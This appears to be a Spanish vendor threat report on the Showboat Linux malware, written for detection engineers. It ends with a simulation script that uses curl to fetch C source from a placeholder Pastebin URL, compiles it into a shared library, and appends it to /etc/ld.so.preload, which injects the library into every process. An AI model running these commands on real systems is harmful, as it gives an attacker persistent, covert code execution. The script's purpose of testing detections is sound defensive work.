El Malware Showboat Apunta a Empresas de Telecomunicaciones en Medio Oriente Desde 2022
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Showboat es un marco modular de post-explotación para Linux construido para entornos AMD x86-64. Activo desde mediados de 2022, está diseñado para mantener acceso a largo plazo y discreto dentro de redes comprometidas. El malware utiliza métodos avanzados de evasión, incluyendo encriptación XOR y el abuso del enlazador dinámico para ocultar procesos maliciosos.
Investigación
La investigación rastreó la infraestructura de comando y control hasta Chengdu, China, lo que, junto con las tácticas, técnicas y procedimientos observados, sugiere vínculos con actores de amenaza alineados con la RPC. El análisis técnico mostró que el malware depende de una llave XOR codificada para descifrar su configuración y abusa de ld.so.preload para lograr el sigilo en los sistemas infectados.
Mitigación
Los defensores deben vigilar los cambios no autorizados en /etc/ld.so.preload y el uso sospechoso del gcc compilador en hosts Linux de producción. También se recomienda desplegar monitoreo de red capaz de identificar comportamientos de baliza, incluso cuando la sincronización es aleatoria, y usar monitoreo de integridad para bibliotecas críticas del sistema.
Respuesta
Si se detecta actividad de Showboat, aísle inmediatamente los sistemas Linux afectados de la red para detener el tráfico de comando y control adicional. Realice análisis forense de memoria para identificar objetos compartidos inyectados y lleve a cabo una auditoría completa de las configuraciones del sistema y tareas programadas para confirmar que todos los mecanismos de persistencia han sido eliminados.
graph TB %% Definición de clases classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware_entity fill:#ff9999 classDef network fill:#99ff99 %% Definición de nodos %% Etapa 1: Configuración inicial action_decryption[«<b>Acción</b> – <b>T1027: Archivos o información ofuscados</b><br/>Recupera la configuración cifrada mediante XOR<br/>utilizando la clave codificada: look me, AV!<br/>Objetivo: telecom.webredirect[.]org»] class action_decryption action %% Etapa 2: C2 y exfiltración malware_showboat[«<b>Malware</b> – <b>Showboat</b><br/>Agente del ciclo de vida posterior a la explotación»] class malware_showboat malware_entity action_beaconing[«<b>Acción</b> – <b>T1071: Protocolo de capa de aplicación</b><br/>Establece C2 mediante balizas periódicas<br/>Utiliza intervalos de espera aleatorios para evadir la detección»] class action_beaconing action action_exfiltration[«<b>Acción</b> – <b>T1029: Transferencia programada</b><br/>Agrupa información del host y capturas de pantalla en JSON<br/>Cifra y codifica los datos en Base64<br/>Utiliza esteganografía en campos PNG para evadir la detección»] class action_exfiltration action %% Etapa 3: Sigilo y persistencia action_fetch_source[«<b>Acción</b> – <b>T1105: Transferencia de herramientas al sistema comprometido</b><br/>Obtiene el archivo fuente en C ukpkmkk.c<br/>Origen: URL de Pastebin»] class action_fetch_source action action_compile[«<b>Acción</b> – <b>T1059: Intérprete de comandos y scripts</b><br/>Compila ukpkmkk.c localmente en la máquina de la víctima<br/>Genera una biblioteca compartida maliciosa»] class action_compile action action_hijack[«<b>Acción</b> – <b>T1574.006: Secuestro del flujo de ejecución: Secuestro del enlazador dinámico</b><br/>Utiliza el mecanismo ld.so.preload<br/>Inyecta /tmp/ukpkmkk.so en los procesos»] class action_hijack action action_stealth[«<b>Acción</b> – <b>T1564: Ocultamiento de artefactos</b><br/>Intercepta llamadas al sistema como readdir()<br/>Oculta procesos de ps y top mediante listas de filtrado»] class action_stealth action %% Conexiones malware_showboat –>|ejecuta| action_decryption action_decryption –>|establece| action_beaconing action_beaconing –>|exfiltra_datos| action_exfiltration action_exfiltration –>|activa_comando_de_ocultación| action_fetch_source action_fetch_source –>|conduce_a| action_compile action_compile –>|genera_biblioteca| action_hijack action_hijack –>|logra| action_stealth %% Mapeo final del flujo action_stealth -.->|mantiene| malware_showboat
Flujo de Ataque
Detecciones
Intento de Comunicaciones Sosppechosas de Dominio Pastebin (vía proxy)
Ver
Carga/Descarga Remota de Archivos vía Herramientas Estándar (vía línea de comandos)
Ver
Detección de Actividad de Baliza de Malware Showboat [Creación de Procesos en Linux]
Ver
Detectar Actividad de Malware Showboat – Modificación de ld.so.preload y Obtención de Archivo Fuente [Creación de Procesos en Linux]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa deben reflejar directamente los TTPs identificados y buscar generar la telemetría exacta que espera la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un mal diagnóstico.
-
Narrativa y Comandos de Ataque: El atacante busca establecer una intervención persistente de llamadas del sistema. Comienzan descargando un archivo fuente C malicioso desde una URL cruda de Pastebin utilizando
curl. Una vez descargado, utilizangcccon las banderas-sharedand-fPICpara compilar la fuente en un archivo de objeto compartido llamadomalicious.so. Finalmente, intentan lograr persistencia agregando la ruta de esta biblioteca a/etc/ld.so.preload. Esta secuencia está diseñada para inyectar la biblioteca maliciosa en cada proceso del sistema. -
Script de Prueba de Regresión:
#!/bin/bash # Simulación de TTPs de Malware Showboat # 1. Simular obtención de fuente C desde Pastebin # Nota: Usando un enlace real de pastebin (simulado para lógica) o simulando la cadena echo "Creando simulación de descarga de pastebin falso..." echo 'void __attribute__((constructor)) init() {}' > fake_malware.c # Este comando activa la parte 'selection_fetch' de la regla curl -s https://pastebin.com/raw/example_id -o fake_malware.c # 2. Simular compilación de un objeto compartido # Este comando activa la parte 'selection_compile' de la regla # (selection_fetch Y selection_compile) gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c # 3. Simular modificación de ld.so.preload # Este comando activa la parte 'selection_preload' de la regla echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload echo "Simulación completa. Verifique SIEM para alertas." -
Comandos de Limpieza:
#!/bin/bash # Limpiar artefactos de simulación # Eliminar la biblioteca y fuente maliciosas sudo rm -f /tmp/malicious.so rm -f fake_malware.c # Eliminar la entrada de ld.so.preload (Requiere precaución) # Este comando sed elimina la línea que contiene /tmp/malicious.so sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload echo "Limpieza completa."